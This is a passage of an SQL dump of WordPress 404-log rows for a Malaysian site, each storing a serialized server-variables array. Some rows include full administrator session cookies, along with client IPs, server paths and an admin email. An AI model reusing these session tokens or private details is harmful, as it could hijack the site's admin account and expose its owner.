Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"2A0E3B88-8083-4B31-917F-93652A9BBE46\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYmaOt6TjIfvDQGV8EDNqAAAAQ0\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.214\";s:11:\"REMOTE_PORT\";s:5:\"50537\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYmaOt6TjIfvDQGV8EDNqAAAAQ0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569299002.7557\";s:12:\"REQUEST_TIME\";s:10:\"1569299002\";}}','notice','2019-09-24 04:23:24','2019-09-24 04:23:23',31087872,32891808,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.115.214'),(26898,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"AB0E75BF-49B0-4F40-BC9C-C896BC6DEC7A\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYmY9ljyRHmaHiu4v5eR3wAAAdA\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.214\";s:11:\"REMOTE_PORT\";s:5:\"51966\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYmY9ljyRHmaHiu4v5eR3wAAAdA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569298678.4869\";s:12:\"REQUEST_TIME\";s:10:\"1569298678\";}}','notice','2019-09-24 04:18:01','2019-09-24 04:17:58',31476288,33293064,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.115.214'),(26897,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"040BE115-DE4E-4F69-B8EE-B31DEB9FE924\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYmNon@TiEpPz-1@8IeWFQAAAYo\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.214\";s:11:\"REMOTE_PORT\";s:5:\"64469\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYmNon@TiEpPz-1@8IeWFQAAAYo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569295778.1416\";s:12:\"REQUEST_TIME\";s:10:\"1569295778\";}}','notice','2019-09-24 03:29:39','2019-09-24 03:29:38',31089072,32896824,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.115.214'),(26896,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3423.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYmHrVjyRHmaHiu4v5eDHAAAAcQ\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"27.102.129.131\";s:11:\"REMOTE_PORT\";s:5:\"49231\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYmHrVjyRHmaHiu4v5eDHAAAAcQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569294254.052\";s:12:\"REQUEST_TIME\";s:10:\"1569294254\";}}','notice','2019-09-24 03:04:15','2019-09-24 03:04:14',30755136,32563192,'https://bintara.com.my/our-history/about1/',1,0,'27.102.129.131'),(26895,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:63:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/blog/tag/video-conferencing/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:2:\"21\";s:13:\"H2_STREAM_TAG\";s:5:\"85-21\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_CACHE_CONTROL\";s:9:\"max-age=0\";s:11:\"HTTP_COOKIE\";s:774:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wordpress_sec_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569376332%7CDHME1XFrUhlecJWYWREpsqI0IQP4JrrN9xSe7eOnBLf%7C7666d1ce86dd205c7585f82f8f746a43fec60d35baf243ae9d603987f35459c0; wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569376332%7CDHME1XFrUhlecJWYWREpsqI0IQP4JrrN9xSe7eOnBLf%7C96d187f4ef032996fbf808f94ac1a8bab67286bc737d9ad6ec25670084de842b; wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7Ceb19a3fe82fc8ce4d135151b0fa401c08e97aa9bf901e8cdeaea7983f994015d; wp-saving-post=1-saved; wp-settings-time-1=1569292236; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D0%26editor_plain_text_paste_warning%3D1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:114:\"https://app.neilpatel.com/en/seo_analyzer/site_audit?domain=bintara.com.my&view=overview&issue=content_count_words\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:2:\"21\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"85-21\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/blog/tag/video-conferencing/\";s:19:\"REDIRECT_SCRIPT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYmFMsrlkXDIX@rVBbHzFgAAABU\";s:12:\"REDIRECT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.214\";s:11:\"REMOTE_PORT\";s:5:\"56106\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:51:\"https://bintara.com.my/blog/tag/video-conferencing/\";s:10:\"SCRIPT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYmFMsrlkXDIX@rVBbHzFgAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569293619.0153\";s:12:\"REQUEST_TIME\";s:10:\"1569293619\";}}','notice','2019-09-24 02:53:40','2019-09-24 02:53:39',31641440,31904608,'https://bintara.com.my/blog/tag/video-conferencing/',1,1,'175.142.115.214'),(26894,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"318\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"429095E5-7F62-4BCF-928A-C883972C1640\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYl44qlcngZvooN2hHYddQAAAMk\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.214\";s:11:\"REMOTE_PORT\";s:5:\"55560\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYl44qlcngZvooN2hHYddQAAAMk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569290466.1572\";s:12:\"REQUEST_TIME\";s:10:\"1569290466\";}}','notice','2019-09-24 02:01:07','2019-09-24 02:01:06',31090640,32899912,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.115.214'),(26893,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"141E4B92-7ECB-48D7-BBF8-C9FA244D5C39\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYl4balcngZvooN2hHYdRQAAAM4\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.214\";s:11:\"REMOTE_PORT\";s:5:\"61586\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYl4balcngZvooN2hHYdRQAAAM4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569290350.0848\";s:12:\"REQUEST_TIME\";s:10:\"1569290350\";}}','notice','2019-09-24 01:59:12','2019-09-24 01:59:10',31091176,32895272,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.115.214'),(26892,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:69:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/wp-admin/admin-ajax.php\";s:14:\"CONTENT_LENGTH\";s:4:\"4909\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"9\";s:13:\"H2_STREAM_TAG\";s:5:\"195-9\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:46:\"application/json, text/javascript, */*; q=0.01\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:771:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wordpress_sec_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569376332%7CDHME1XFrUhlecJWYWREpsqI0IQP4JrrN9xSe7eOnBLf%7C7666d1ce86dd205c7585f82f8f746a43fec60d35baf243ae9d603987f35459c0; 